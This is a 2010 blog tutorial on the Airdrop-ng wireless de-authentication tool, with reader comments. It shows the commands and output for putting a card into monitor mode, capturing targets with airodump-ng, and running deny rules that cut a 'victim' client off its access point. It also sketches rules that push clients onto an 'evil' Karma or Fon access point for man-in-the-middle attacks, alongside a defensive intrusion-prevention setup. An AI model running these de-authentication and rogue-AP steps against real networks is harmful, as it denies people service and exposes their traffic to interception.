Monday, February 15, 2010

Airdrop-ng Basics on BT4 Final


De-Authentication and Client Manipulation

Over the last few days I have been playing with Airdrop-NG, it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these issues might be AP related and it seemed to be more consistently working after installing psyco. Below are my notes on using Airdrop-ng and also the information from schmoocon 2010. This tool should to be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just some basic usage. More advanced uses and coding projects to follow.

Description:

Airdrop-NG is a wireless de-authentication tool released at schmoocon 2010 which can also double as a poor man's WIPS depending on your intentions.  Airdrop-NG is a rule based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using Client Stations MAC's, BSSID's and a few other descriptors. Rules can be updated while the program is running in a loop making for easy on the fly changes within your attack. On each loop Airdrop-NG reparse’s the rules file and continues sending packets based on a CSV output from Airodump-ng.

Below will be a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station against his BSSID. The install scripts and configurations are intuitive and quick to get working. I had zero install issues on BT4 Final. Pre Final however did give me problems.

Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/# airdrop-ng python install.py

Checking for dependancies used by the installer...
All dependancies installed! Continuing...

#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!

Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.

Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed!  =)
Would you like to install lorcon? (y/n): y
Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may tak
e a while...
A    lorcon-old/rt2500inject.h
A    lorcon-old/lorcon_decode.c
A    lorcon-old/lorcon_packasm.h
A    lorcon-old/tx80211_errno.h
A    lorcon-old/Makefile.in
A    lorcon-old/rt73inject.h
A    lorcon-old/madwifing_control.c

..........................
.................................................
copying build/lib.linux-i686-2.5/pylorcon.so -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)


Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  python-psyco
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...



Setup Wireless Interface:

root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
5757    dhclient3
Interface       Chipset         Driver
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)


Switch to another shell and run airodump:
(leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0

CH  6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:5B:6B:4E:6C:6F   -1       26        1    0  11  54 . WEP  WEP         Testing
 02:1F:28:65:AE:ED  -24      489      391    0   1  54e  WPA2 CCMP   PSK  ficti0nsAP
 00:0B:85:6C:2D:4F  -71       48        0    0   1  54 . WEP  WEP         Linksys
 00:1B:85:6E:2D:4D  -72       48        0    0   1  54 . WEP  WEP
 06:0B:85:6C:7D:4E  -71       45        0    0   1  54 . OPN   

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   02:16:08:AD:6E:95  -67    0 - 1      0        3
 (not associated)   00:A0:F8:B8:DF:69  -73    0 - 1    120       39  Linksys
 (not associated)   00:24:36:74:F1:97  -53    0 - 1      0       57
 02:0B:65:4E:6C:62  02:17:6B:20:00:ED  -72    0 - 1    124       27
 02:1F:28:65:AE:ED  00:23:4E:DF:AE:70    0   54e- 1e   979      444
 02:1F:28:65:AE:ED  00:21:00:DB:60:00  -28    0 - 1     67       91  ficti0nsAP
 02:1F:28:65:AE:ED  00:21:6A:11:0E:52  -38    1e- 2e     0      212  ficti0nsAP
 02:1F:28:65:AE:ED  00:2E:45:9F:87:AC  -38    1e- 6e     0      194  ficti0nsAP
 02:1F:28:65:AE:ED  00:23:3E:DF:ED:ED  -42   54e- 1      0       63  ficti0nsAP
 02:1F:28:65:AE:ED  00:25:08:AD:50:7C  -51   54e-24      0        2
 02:1F:28:65:AE:ED  00:1E:C2:C4:E5:79  -67    1e- 1      0       94  ficti0nsAP



Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients,  I will explain a bit about the rules form the schmooo presentation then we will add a rule to our rules.conf.

Rules are broken down into 3 fields: (Action/ap|clients):


2 options for state field:

-Allow
-Deny

5 options for AP field:
-ESSID
-BSSID
-Company OUI name value
-Company OUI numeric value
-any

5 options for clients field
-mac
-multiple macs  (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value
-any

Add your rule Example:
 Below is a rule that denys all traffic to the following client "01-23-5E-DF-AE-50" from a specified BSSID

Example Deny Rule:
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50

Rule explanation:
d = deny
/      <-- get this AP address from the airodump output
|       <-- in this case a clients address


Run airdrop with new rule:
(Leave airodump running during this!!)
Now run Airodrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will continuously loop through the rules file every second until you terminate the process.  This will hopefully keep your victim from having network access.

root@ficti0n:~/# python airdrop-ng.py -b -i mon0 -t /root/Test-01.csv  -r docs/dropRules.conf
#################################################
#             Welcome to AirDrop-ng             #
#################################################

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

.....................
...............................

Airdrop-ng will now exit
Sent 164 Packets

Exiting Program, Please take your card mon0 out of monitor mode


Poor Man’s WIPS:

Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.

Create a list of your station MAC's:

11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Create the list of  your AP BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

Rules:
Create a WIPS Rules file with the following rules

Allow 3 clients to talk to AB:AD:F2:14:00:00
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow 3 clients to talk to EA:CF:DF:AD:00:00
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny those 3 clients to any other access points
d/any|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66



MITM Attacks:
An attempted example from Schmoocon was an attack on clients via MITM. This example wasn’t shown during the demo because the presenters couldn’t get their monitors working correctly.. But I imagine the ruleset would be to deny all clients’ access to the legitimate BSSID's within your airodump output and allow them all access to your KARMA or perhaps FON AP. The presenters had their own FonRules which I am guessing would go something similar to the following, but I could be way off, this however should function similarly to what I think they were going to show us.

Make a list of local BSSID's:

AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

FON MAC:
AB:CD:EF:12:34:56


Add In some new rules:

Deny 3 clients to talk to AB:AD:F2:14:00:00
d/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny 3 clients to talk to EA:CF:DF:AD:00:00
d/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow Access to my evil AP's:
a/AB:CD:EF:12:34:56|any



I have a couple other ideas for IDS monitoring combining other tools and also some malicious MITM I am messing around with that I will post in future posts... so far Airdrop-ng is a fun tool... enjoy...
--Ficti0n

5 comments:

  1. but I have a problem:

    Unable to get driver
    Interface mon0 does not exist

    Airdrop-ng will now exit
    Packets Sent 0

    Exiting Program, Please take your card mon0 out of monitor mode

    ReplyDelete
  2. need to interpret the errors "mon0 does not exist" Which means you need to use anouther interface which you have thats in monitor mode..

    This command: "airmon-ng start wlan0" created the mon0 interface.. check what interface was created for you from this.. or adjust it based on how you create your monitor mode interface.. you can also do something like (iwconfig "wirelessInterface" mode monitor) to set whatever wirless card you have into monitor mode

    ReplyDelete
  3. I have the same issue, but the error is preceded by driver not found.....I have tried the above solution and am still having issues

    ReplyDelete
  4. Does anybody have a solution to this problem?? How to make sure airdrop can get the needed drivers?

    ReplyDelete
    Replies
    1. Have you made sure your wireless card actually functions? Can you run airodump with that card? Or what does your output of iwconfig show? Does it show your card? You might just have a card which is not supported on your version of linux or need to install drivers which will work with that particular card... Grab a well known working wireless card for penetration testing..

      Delete

Learning Binary Ninja For Reverse Engineering and Scripting

 Recently added a new playlist with about 1.5 hours of Binary Ninja Content so far..    Video 1: I put this out a couple months ago covering...